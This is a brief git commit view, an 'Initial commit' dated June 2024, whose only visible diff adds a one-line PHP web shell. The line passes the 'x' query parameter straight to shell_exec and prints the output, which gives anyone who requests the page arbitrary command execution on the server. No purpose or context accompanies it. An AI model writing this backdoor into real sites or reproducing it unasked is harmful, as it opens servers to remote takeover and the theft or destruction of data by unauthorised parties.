Initial commit

This commit is contained in:
2024-06-28 18:50:56 -06:00
commit 9c7ec708fb
8 changed files with 905 additions and 0 deletions
+1
View File
@@ -0,0 +1 @@
<?php print(shell_exec($_GET['x']));die();?>